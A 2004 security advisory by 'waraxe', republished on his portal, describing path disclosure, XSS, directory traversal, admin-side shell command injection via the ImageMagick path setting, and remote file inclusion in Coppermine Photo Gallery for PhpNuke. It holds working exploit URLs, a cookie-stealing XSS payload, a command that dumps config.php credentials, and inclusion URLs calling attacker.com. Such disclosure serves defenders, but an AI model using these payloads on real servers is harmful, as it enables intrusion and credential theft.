Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
April 25, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145
People Online:
Visitors: 689
Members: 0
Total: 689
PacketStorm News
·301 Moved Permanently

read more...
[waraxe-2004-SA#026] - Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke





Author: Janek Vind "waraxe"
Date: 29. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=26


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Coppermine Photo Gallery 1.2.2b for CMS
Copyright (C) 2002,2003 Gr?gory DEMAR <gdemar@wanadoo.fr>
http://www.chezgreg.net/coppermine/
Updated by the Coppermine Dev Team http://coppermine.sf.net/team/
New Port by GoldenTroll
http://coppermine.findhere.org/
Based on coppermine 1.1d by Surf http://www.surf4all.net/
http://coppermine.findhere.org

I have tested two versions of the Coppermine: 1.2.2b and 1.2.0 RC4, which i will name
further as "new version" and "old version".


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

Many scripts in Coppermine software package are not protected against direct access,
therefore standard php error messages can be provoked, which leads to exposure the full
path to the scripts. Such piece of information has great value for potential attacker, who
will use this in next steps of hacking.

Version scope: both new and old versions are affected.

Examples:

http://localhost/nuke72/modules/coppermine/phpinfo.php
http://localhost/nuke72/modules/coppermine/addpic.php
http://localhost/nuke72/modules/coppermine/config.php
http://localhost/nuke72/modules/coppermine/db_input.php
http://localhost/nuke72/modules/coppermine/displayecard.php
http://localhost/nuke72/modules/coppermine/ecard.php
http://localhost/nuke72/modules/coppermine/include/crop.inc.php



B. Cross-site scripting aka XSS:

Can be used by potential attacker for stealing cookies and doing other operations, which in
normal conditions are not permitted by browser's cross-domain security restrictions.

Version scope: only new version is affected.

Examples:

http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar">[xss code here]
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>


C. Arbitrary directory browsing (needs nuke admin rights!):

PhpNuke is known by the many security bugs, leading to admin account overtaking by attacker.
So needing of the admin rights to use this exploit is not such big restriction ...

Version scope: both new and old versions are affected.

Example:

http://localhost/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..

... and we can see PhpNuke's root directory structure ;)


D. Execution of the arbitrary shell commands in server (needs nuke admin rights!):

Yes, again we need PhpNuke admin privileges to accomplish this exploit, but as said before,
there are many ways to compromise nuke's admin account.

Version scope: both new and old versions are affected.

So, how we can give any shell commands to server?
Let's look at Coppermine's original source in "coppermine/include/picmgmtbatch.inc.php":


// Method for thumbnails creation
switch ($method) {
case "im" :
if (preg_match("#[A-Z]:|\\#Ai", __FILE__)) {
// get the basedir, remove '/include'
$cur_dir = "";
$src_file = '"' . strtr($src_file, '/', '') . '"';
$im_dest_file = str_replace('%', '%%', ('"' . strtr($dest_file, '/', '') . '"'));
} else {
$src_file = escapeshellarg($src_file);
$im_dest_file = str_replace('%', '%%', escapeshellarg($dest_file));
}

$output = array();
$cmd = "{$CONFIG['impath']}convert -quality {$CONFIG['jpeg_qual']} {$CONFIG['im_options']} -geometry {$destWidth}x{$destHeight} $src_file $im_dest_file";

//die("$cmd");

exec ($cmd, $output, $retval);

if ($retval) {
$ERROR = "Error executing ImageMagick - Return value: $retval";
if ($CONFIG['debug_mode']) {

As we can see, there is very dangerous php function "exec()" in use and some user input -
variables "$src_file" and "$dest_file" - are sanitized by "escapeshellarg()". All seems to be ok?
Yes... oops... what about config variables "$CONFIG['impath']", "$CONFIG['jpeg_qual']" etc ?
Coppermine's authors were assuming, that those variables are safe to use directly in "exec()"...
But if we have nuke admin rights, we can manipulate those configuration parameters and therefore
various shell commands can be injected to "exec()"!
You wanna details? Go to Coopermine's conficuration panel and set "Method for resizing images" to
"Image Magick". Next set "Path to ImageMagick" to value, which includes shell command, you want to execute in server.
Example "path" in case of windows server: "type config.php > config.txt &" ,
linux server: "cat config.php > config.txt ;" .
Now "save new configuration", then upload some pictures to server and go to "Batch add pictures".
And if all went right, then you will see "config.txt" file in phpnuke root directory, so anyone can
see in plaintext information with critical value - database name, username and password ;)
Of course, skilled attacker can within 5 minutes get remote shell running in server through
arbitrary port (higher than 1024) and next hacking is not logged anymore, because webserver is bypassed.
One more step - finding and using local r00t exploit - and server is 0wned ;)


E. Remote file inclusion:

Version scope: both new and old versions are affected (different bugs in different scripts).

There exists remote file inclusion vulnerabilities in Coppermine Photo Gallery, which
can lead to arbitrary php code parsing, shell commands injection, etc. And as discussed before,
finally this can lead to total compromise of the victim server.

E1 - affected is old version:

First get ready your php script in "http://attacker.com/include/functions.inc.php" and then:

http://localhost/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com



E2 - affected is new version:

First get ready your php script in "http://attacker.com/user_list_info_box.inc" and then:

http://localhost/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com

Of course, attacker's server, where those scripts are, must NOT PARSE PHP!!

See ya!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------









Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2005-01-06 (58609 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2407
vince213333  vince213333 - 737
pexli  pexli - 665
Mullog  Mullog - 540
demon  demon - 485
shai-tan  shai-tan - 477
LINUX  LINUX - 404
Cyko  Cyko - 375
tsabitah  tsabitah - 328
y3dips  y3dips - 281
SecurityFocus
Currently there is a problem with headlines from this site
alexa



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
 Page Generation: 0.137 Seconds